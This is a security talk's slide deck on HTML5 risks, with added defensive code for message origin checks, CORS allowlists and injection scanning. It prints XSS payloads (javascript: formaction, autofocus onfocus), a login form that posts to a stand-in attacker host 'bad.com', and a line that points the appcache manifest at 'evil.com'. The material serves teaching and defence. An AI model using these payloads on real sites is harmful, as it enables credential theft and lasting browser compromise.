HTML5 a clear & present danger - Iv2 technologies · Renaud Bidou

Securing & Accelerating Your Applications 1/29/2014 Deny All © 2012 1 1/29/2014 Deny All © 2013 1 HTML5 a clear & present danger Renaud Bidou CTO


Page 1

HTML5

a clear & present danger

Renaud Bidou

CTO

Page 2

Menu

1. HTML5 new capabilities

2. HTML5 tricks

3. Empowering common threats

4. Hackers' dreams come true

Page 3

What’s new with HTML5

Page 4

HTML5 short history

• Project led by W3C

• Latest draft: HTML 5.1 – May 2, 2013

– Previous: December 17, 2012

– Previously: 13 drafts starting from January 22, 2008

• Why HTML5?

– Make HTML content natively dynamic

– Support offline mode

– Increase security control and tuning

– Improve internals for performance, task parallelization etc.

Page 5

New HTML content

• On-the-fly graphics with the <canvas> tag

• Native MP3, Ogg and Wav audio format support with the <audio> tag

• Native MP4, WebM and Ogg video format support with the <video> tag

• Drag & Drop! with the draggable attribute and the ondrop event handler

• Embedded geolocation with the new getCurrentPosition() method

Page 6

Input Validation

• New input types through the <input type> attribute

– Email: type="email"

– URL: type="url"

– Numbers: type="number", type="range"

– Date: type="date", type="month", type="week"

• Embedded format validator

– Based on the type attribute value

– Can be enforced through the pattern attribute

– Can be disabled… don't try to understand…

<form novalidate>

Page 7

New forms inputs

<input type="email">

<input type="url">

<input pattern="\d{4}" placeholder="4 digits PIN">

<input type="number" min="0" max="10" step="2" value="6">

Page 8

New HTML internals

• Web Workers enable JavaScript background processing

• Web Storage improves local storage to extend the cookie concept and natively support session-based data handling

• WebApp Cache to enable offline mode of Web/Cloud based applications

• Server Sent Events (SSE) enable Server to Client communication through the established connection

Page 9

HTML5 new security tricks

Page 10

iFrame Sandboxing

• iFrames sandboxing

– forbids forms, scripts, popups, access to cookies, local storage

– considers the content as being provided by another domain

• iFrame sandboxes are not set by default

– Backward compatibility

– sandbox attribute to be explicitly set, without value

<iframe src="iframe-source.html" sandbox="">

Not natural at all

Page 11

Cross-document messaging

• Cross-document messaging

– provides a mechanism for iframes to communicate with the parent document

– overrides HTML4 restrictions

• Implementation failure

– Parent frame is supposed to control the sources of messages

– Rarely (never) performed

– Origin iframe identification not even enforced

window.parent.postMessage('hello', '*');

(the '*' argument: origin iFrame ID – wildcards are valid & recommended)
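The origin control the slide says is rarely (never) performed, written out as an added example that is not from the talk. It models a parent-window message handler as a pure function so it runs without a DOM; the trusted origin and the message types are hypothetical.

```javascript
// Added example (not from the slides): the parent-frame side of
// cross-document messaging, with the origin check the talk says is missing.
// A MessageEvent is modelled as a plain object { origin, data, source } so the
// logic can be exercised under Node; the trusted origin is hypothetical.

const TRUSTED_CHILD_ORIGINS = new Set([
  'https://widgets.example', // hypothetical origin of the embedded iframe
]);

// Only a small, known message vocabulary is accepted; anything else is dropped.
const ALLOWED_TYPES = new Set(['resize', 'ready']);

// Returns a decision object instead of acting on the DOM, so it is testable.
function handleChildMessage(event, trusted = TRUSTED_CHILD_ORIGINS) {
  // 1. Origin check: event.origin is filled in by the browser and cannot be
  //    forged by the sender. Compare exactly; no prefix or substring tests.
  if (!trusted.has(event.origin)) {
    return { accepted: false, reason: 'untrusted origin ' + event.origin };
  }
  // 2. Treat the payload as data, never as code or markup: require an object
  //    with a known type rather than eval()/innerHTML on whatever arrived.
  const msg = event.data;
  if (typeof msg !== 'object' || msg === null || !ALLOWED_TYPES.has(msg.type)) {
    return { accepted: false, reason: 'unexpected message shape' };
  }
  // 3. Reply to the sender only, and pin the reply to its verified origin
  //    instead of '*', so a frame that has since navigated elsewhere cannot read it.
  return { accepted: true, reply: { type: msg.type + '-ack' }, replyTargetOrigin: event.origin };
}

// Browser wiring (not executed under Node):
// window.addEventListener('message', (e) => {
//   const d = handleChildMessage(e);
//   if (d.accepted) e.source.postMessage(d.reply, d.replyTargetOrigin);
// });
```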

Page 12

iFrame insecurity

• Sandboxes are not applied

– iFrames provide access to local storage

– iFrames allow script execution and forms

• Thanks to cross-document messaging

– iFrames communicate with the parent window

HTML5 opens doors between iframes and parents

Page 13

CORS

• Cross-Origin Resource Sharing

• Required for « modern » applications

• Browsers to handle 3rd party domains content

[Diagram: an HTML5 powered browser loads (1) the main page from Site A, then (2) requests 3rd party content from Site B]

Page 14

CORS tricky concept

• CORS « security » controls

[Diagram: the two exchanges, (1) with Site A and (2) with Site B]

1. GET / HTTP/1.1
   Host: Site_A

   HTTP/1.1 200 OK

2. GET /content.htm HTTP/1.1
   Host: Site_B
   Origin: http://Site_A

   HTTP/1.1 200 OK
   Access-Control-Allow-Origin: http://Site_A

• rely on

– Origin and Access-Control-Allow-Origin headers

– Relevant access control implemented on server

– Client/Server trust relationship ???

Page 15

CORS Security Issues

• Access control

– No implementation standard

– Often set at site level through includes, or left universal: Access-Control-Allow-Origin: *

No reliable access control on server

• Preflighted requests

– Inform about supported methods

– Define the security policy set on the browser

– Responses are cached on client

Browsers will not update their security policy
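Server-side CORS logic that addresses both issues above, the universal `Access-Control-Allow-Origin: *` and the long-lived cached preflight, as an added example that is not from the talk. The allowed origin and the method list are hypothetical; the function takes request fields and returns headers, so it runs without a web server.

```javascript
// Added example (not from the slides): server-side CORS decision logic with an
// explicit allowlist instead of "*" and a short preflight cache lifetime.
// The origin and method list are hypothetical; the function is pure
// (request fields in, response headers out) so it can be unit-tested.

const ALLOWED_ORIGINS = new Set(['https://site-a.example']); // hypothetical
const SUPPORTED_METHODS = ['GET', 'POST'];                     // what this API needs

// The universal setting from the slide: every origin may read the response.
function corsHeadersUniversal() {
  return { 'Access-Control-Allow-Origin': '*' };
}

// Hardened variant. `req` = { method, origin, acrMethod }, where origin is the
// Origin request header and acrMethod is Access-Control-Request-Method.
function corsHeaders(req, allowed = ALLOWED_ORIGINS) {
  const headers = {};
  // No Origin header: not a CORS request, so grant nothing.
  if (!req.origin) return headers;
  // Exact match only. Never reflect an arbitrary Origin, and never use
  // startsWith()/includes(): "https://site-a.example.evil" would pass those.
  if (!allowed.has(req.origin)) return headers; // the browser then blocks the read
  headers['Access-Control-Allow-Origin'] = req.origin;
  // The response now varies by Origin; tell shared caches so that one
  // origin's grant is not served to another.
  headers['Vary'] = 'Origin';
  if (req.method === 'OPTIONS' && req.acrMethod) {
    // Preflight: grant only the methods this API actually supports.
    if (!SUPPORTED_METHODS.includes(req.acrMethod)) return {};
    headers['Access-Control-Allow-Methods'] = SUPPORTED_METHODS.join(', ');
    headers['Access-Control-Allow-Headers'] = 'Content-Type, Authorization';
    // Short cache (seconds) so a tightened policy reaches browsers quickly;
    // the slide's point is that cached preflights are not re-evaluated.
    headers['Access-Control-Max-Age'] = '300';
  }
  return headers;
}
```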

Page 16

The Gig

1. CORS obsoletes SOP

– « Native » browsing on internal networks

– Powerful DoS capabilities

– Accurate network (IP, port) scan behind the firewall

– Etc.

2. iFrames are out of control

Browsers are turned into proxies

Page 17

Empowering usual attacks

Page 18

Injections heaven

• 31 HTML5 new tags

– 31 new injection vectors supported by browsers

<audio> <canvas> <command> <embed> <nav> <param> <source> <ruby> <track> <video> …

• 52 + 1 HTML5 new script event handlers

– 52 on* injection points

– + formaction: will bypass on\w+= like filters

<form id="test" />
<button form="test" formaction="javascript:alert(1)">

Thousands of new evasion combinations

Page 19

Attributes you will love

• Self-triggering execution through autofocus

<input type="text" value="" onfocus="alert(1)" autofocus>

<body onscroll=alert(1)>
<br><br><br><br><br><br>...<br><br><br>
<input autofocus>

• Overwrite user input with dirname

– Can be efficiently combined with appropriate handlers

<form action="" method="post">
<input name="username" value="admin" />
<input name="password" type="password" value="secret" />
<input name="captcha" value="" dirname="password"/>
<input type="submit">
</form>

username=admin&password=ltr&captcha=

Stealth user abuses

Page 20

Drag&Drop Jacking

• Abusing the D&D API

– Have a user drag & drop something

• Image, text, browser element (scrollbar, slider etc.)

– Set the value of the dragged element to whatever you want

• Malicious data to be submitted on behalf of the user

• Confidential data to be stolen

– Have an invisible element follow the mouse

– Set the ondrop event handler of the iFrame to whatever …

• Feed form content (with malicious data): CSRF

• Send content (stolen data) to 3rd party: Cross-domain data leak

Bypasses cross-domain & CSRF protections

Page 21

S'more Clickjacking

• External forms content definition

– Thanks to the form & formaction attributes

– Can also be used to bypass CSRF protections

– Not that subtle, but still smarter than average users…

<form id='auth' action='/login'>
<input type='text' placeholder='login'>
<br><input type='password' placeholder='password'>
<br><input type='submit' value='Enter'>
</form>
<input form='auth' type='submit' value='Enter HERE' formaction='http://bad.com/thanks' >

Trivial data theft & CSRF protections bypass

Page 22

XSS Unleashed

• Screenshots with XSS

– Thanks to the <canvas> tag…

[Diagram, actors: Hacker, Vulnerable App, Victim Browser, Relay]

1. Hacker exploits XSS vulnerability

2. Malicious JavaScript is loaded on Victim

3. Victim executes JavaScript

4. Victim sends screenshot

5. Hacker retrieves screenshot

Page 23

BotnetNG

• Bi-directional communication channel

– Server-Sent Events to change web-based botnets' behaviour

• Past:

– Agent regularly connects to the C&C channel

• to get commands and provide output

• « Easy » to identify and sign

– Threat is in → out

• Efficiently addressed with outgoing proxies

• Now:

– No recurring connections to the C&C channel

• Commands sent by server / responses sent asynchronously

• No standard behaviour to model

– Threat is out → in

• Not addressed by web client security devices

Botnet prevention mechanisms are obsolete

Page 24

HTML5 Inside

Page 25

Password cracking

• A botnet case study

– Targets clients connected to a compromised application

– Used to crack passwords

• Takes advantage of Web Workers

– Browsers compute hashes in the background

– Invisible to the user, no impact on browser performance

• Just theory?

– Ravan, Distributed JS Computing Systems

– Supports MD5 and SHA hashes

– Simply a PoC, users are asked for permission

Web hackers' version of distributed computing

Page 26

Dream comes True

• Issues with injections

– Volatile: limited timeframe

– Persistent: can be removed from the compromised DB

• The Hacker's dream

– Persistent injections for an unlimited timeframe

– Client-side persistency to prevent one-shot removal

• WebApp cache: HTML5 gift to the underground

– Local HTML5 storage

– Independent from browser cache

• Not so easy to clean, whenever possible

– Prevents any request from the client

– Allows caching anything, including the root of the application

Page 27

WebApp Cache

• Browser requests a page

GET / HTTP/1.1

<!DOCTYPE HTML>
<html manifest="site.appcache">

(the manifest attribute holds the Manifest file URL)

• Browser gets the Manifest file

– Specifies pages to be locally cached

– Some more stuff

• Browser stores the files

– Never to be requested again
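To see what a manifest can pin, here is a parser for the manifest format plus an audit of the entries the talk warns about (the application root, cross-origin content), as an added example that is not from the talk. The manifest text and the document origin are constructed for illustration.

```javascript
// Added example (not from the slides): parse an AppCache manifest and flag
// entries that make a poisoned cache hard to dislodge. SAMPLE_MANIFEST and the
// origin passed to auditManifest() are constructed for this illustration.

const SAMPLE_MANIFEST = `CACHE MANIFEST
# constructed sample, not a real site
/app.js
CACHE:
/
https://evil.example/bad.js
NETWORK:
*
FALLBACK:
/ /offline.html
`;

// Manifest format: first line "CACHE MANIFEST", '#' comments, section headers
// CACHE: / NETWORK: / FALLBACK:, one entry per line. Entries before any header
// belong to the CACHE section.
function parseManifest(text) {
  const lines = text.split(/\r?\n/).map((l) => l.trim());
  if (lines[0] !== 'CACHE MANIFEST') throw new Error('not an appcache manifest');
  const sections = { CACHE: [], NETWORK: [], FALLBACK: [] };
  let current = 'CACHE';
  for (const line of lines.slice(1)) {
    if (line === '' || line.startsWith('#')) continue;
    if (/^(CACHE|NETWORK|FALLBACK):$/.test(line)) { current = line.slice(0, -1); continue; }
    sections[current].push(line);
  }
  return sections;
}

// Audit: explain why this manifest would keep serving stale or foreign content.
function auditManifest(text, documentOrigin) {
  const m = parseManifest(text);
  const findings = [];
  const isCrossOrigin = (u) => /^https?:\/\//i.test(u) && new URL(u).origin !== documentOrigin;
  for (const entry of m.CACHE) {
    // Caching "/" means the application root is served from the cache from now on.
    if (entry === '/' || entry === documentOrigin + '/') findings.push('caches application root: ' + entry);
    if (isCrossOrigin(entry)) findings.push('cross-origin cache entry: ' + entry);
  }
  for (const entry of m.FALLBACK) {
    const [namespace, fallback] = entry.split(/\s+/);
    // A "/" namespace makes the fallback page answer for every uncached URL.
    if (namespace === '/') findings.push('fallback covers whole site: ' + fallback);
  }
  return { sections: m, findings };
}
```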

Page 28

The Ultimate APT

• One Scenario

– Exploit a client-side injection vulnerability on a server (XSS)

• Can be volatile, will be used just once

– Have the client browser execute something like

document.getElementsByTagName("html")[0].setAttribute("manifest","http://evil.com/bad.manifest");

(changes the manifest attribute to the attacker's URL)

– Set an entry in the corrupted manifest file to a corrupted file

• with « alternate » capabilities such as phishing or drive-by download

Client access to application compromised forever

Page 29

Conclusion

Page 30

HTML5 opens doors between iframes and parents

Browsers are turned into proxies

Thousands of new evasion combinations

Page 31

Preventing HTML5 abuses

• Identify new HTML5 content

– Tags, attributes, event handlers

• Identify previously defined HTML5 content

– Now removed from recent drafts

– Still supported by browsers

• Evaluate suspicious combinations

– Tag name + attribute + event handler

• Efficiently identify script injections

– Don't try to understand (you can't)

– Identify the nature of data submitted to your application

• Enforce access restrictions

– In the core of applications for Cross-Document Messaging

– At the server level for CORS security
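The "identify new content" and "evaluate suspicious combinations" steps, applied to the vectors from the Injections heaven, Attributes you will love and S'more Clickjacking slides, as an added example that is not from the talk. The tag and attribute lists come from those slides and are deliberately not exhaustive.

```javascript
// Added example (not from the slides): a detection routine for the HTML5
// injection vectors the talk lists: new tags, on* handlers, formaction/form
// (which bypass on\w+= filters), autofocus+onfocus self-triggering, dirname.
// It reports findings rather than trying to "understand" the markup, the way a
// WAF rule or a server-side submission check would. Lists are from the slides.

const HTML5_TAGS = new Set(['audio', 'canvas', 'command', 'embed', 'nav', 'param',
  'source', 'ruby', 'track', 'video']);
// Attributes that execute, redirect or rewrite a submission without an on* name.
const RISKY_ATTRS = new Set(['formaction', 'form', 'autofocus', 'dirname']);
const TAG_RE = /<\s*([a-z][a-z0-9-]*)([^>]*)>/gi;
// name, optionally = "double-quoted" | 'single-quoted' | unquoted value
const ATTR_RE = /([a-z_:][-a-z0-9_:.]*)\s*(?:=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/gi;

// Returns an array of findings { tag, kind, detail } for an untrusted fragment.
function scanHtml(input) {
  const findings = [];
  for (const m of input.matchAll(TAG_RE)) {
    const tag = m[1].toLowerCase();
    const attrs = new Map();
    for (const a of m[2].matchAll(ATTR_RE)) {
      attrs.set(a[1].toLowerCase(), (a[2] ?? a[3] ?? a[4] ?? '').trim());
    }
    if (HTML5_TAGS.has(tag)) findings.push({ tag, kind: 'html5-tag', detail: tag });
    for (const [name, value] of attrs) {
      if (/^on\w+$/.test(name)) findings.push({ tag, kind: 'event-handler', detail: name });
      if (RISKY_ATTRS.has(name)) findings.push({ tag, kind: 'risky-attr', detail: name });
      // javascript: in any attribute value, e.g. formaction="javascript:alert(1)"
      if (/^\s*javascript:/i.test(value)) findings.push({ tag, kind: 'js-url', detail: name });
    }
    // The slide's self-triggering combination: a focus handler plus autofocus.
    if (attrs.has('autofocus') && attrs.has('onfocus')) {
      findings.push({ tag, kind: 'self-triggering', detail: 'autofocus+onfocus' });
    }
  }
  return findings;
}
```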

Page 32

Thank you!


+33 1 46 20 96 00